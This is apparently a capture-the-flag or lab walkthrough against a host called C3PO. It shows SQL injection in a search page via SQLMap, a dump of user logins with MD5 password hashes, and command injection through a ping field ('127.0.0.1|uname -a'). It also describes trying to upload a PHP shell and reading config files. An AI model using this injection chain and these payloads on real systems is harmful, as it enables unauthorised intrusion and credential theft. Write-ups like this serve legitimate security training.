HOSTNAME:C3PO

IP:10.0.1.6

I Found a SQLi in the Search Box

http://10.0.1.6/inc/search.php?query=xxx

By adding the single quotes you’ll get the Error message

I used SQLMap For Quick and Fast injection

as you see 3 types of injection …

Anyway

select table_name FROM information_schema.tables where table_schema='vuln' [13]: [*] adrbook [*] eshop_goods [*] eshop_orders [*] flashgames [*] log [*] messages [*] provozovny [*] review_answers [*] review_category [*] review_questions [*] statistics [*] tickets [*] users select column_name from information_schema.columns where table_name='users' [10]: [*] alterpass [*] heslo [*] id [*] image [*] isadmin [*] login [*] nick [*] remail [*] secondmail [*] telefon SELECT id,login,heslo,isadmin FROM users [13]: [*] 1, karel, f196c5c9a5f002d14cfc2aafce74e39b, 0 [*] 2, jana, 3f858cf8cfd59f25010e71b6b5671428, 0 [*] 12, michal, 955db0b81ef1989b4a4dfeae8061a9a6, 0 [*] 13, Smolicek, 593a90797681ebd0b8c44315a4caf6ff, 0 [*] 14, jezinky, 4475987873e549d5208f8ad743fc3d07, 0 [*] 15, utocnik, 955db0b81ef1989b4a4dfeae8061a9a6, 0 [*] 18, uzivatel, 32250170a0dca92d53ec9624f336ca24, 0 [*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1 [*] 23, prochy, 32f055ca38a83ecb670b04edb50016ad, 0 [*] 24, prochy2, 2d8883c2d85b14fdcb44e3b3dc959535, 0 [*] 25, butterfly2, 1adbb3178591fd5bb0c248518f39bf6d, 0 [*] 26, test, 098f6bcd4621d373cade4e832627b4f6, 0 [*] 27, qyqouxmg, ae219661afe50f60419afbe08c45947d, 0

The Only user Have admin privileges is admin himself

[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1

Login …

go to this option

and as we know The ping option use “system” function or “exec” or … so its clear that this box is vulnerable

Lemme check if its work first let ping the local ip address 127.0.0.1

Okay Cool

To Run many functions you have to use | as separator between them

The PHP code Must be like that

So Let’s Try to send this Request

127.0.0.1|uname -a

Works Fine

Whatever …

I Tried to upload a PHP Shell using “wget” but nothing …

I Read some PHP Files using “cat” command

That lead me to the config file named “base.php”